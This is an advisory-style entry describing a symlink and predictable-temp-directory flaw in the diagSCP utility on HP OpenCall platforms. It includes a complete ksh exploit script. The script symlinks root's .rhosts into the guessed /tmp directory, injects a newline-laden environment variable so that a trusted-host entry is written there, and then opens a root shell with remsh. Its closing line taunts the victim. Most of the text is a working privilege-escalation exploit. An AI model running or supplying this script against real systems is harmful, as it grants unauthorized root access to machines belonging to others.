COMMAND

    diagSCP

SYSTEMS AFFECTED

    OpenCall platforms (HP)

PROBLEM

    The diagSCP utility creates a  temporary directory in /tmp with  a
    predictable name.   It will also  happily follow any  evil symlink
    you put in.  The 'env' file  created by diagSCP  in this directory
    contains  the   user's  environment   and  is   thus  subject   to
    customization.  We just  have to insert some  ^J in a variable  to
    have it go  to the next  line, so it  looks like a  valid entry in
    .rhosts.  Thanks to Otto Sync for this exploit.

        #!/bin/ksh
        FILE=/.rhosts
        NEXT=`expr $$ + 5`
        mkdir /tmp/diagSCP.$NEXT
        ln -s $FILE /tmp/diagSCP.$NEXT/env
        export GUESSWHAT="
        localhost `whoami`"
        diagSCP &
        sleep 2
        kill $NEXT
        echo "\nFrench kiss ? root kiss !\n"
        remsh localhost -l root ksh -i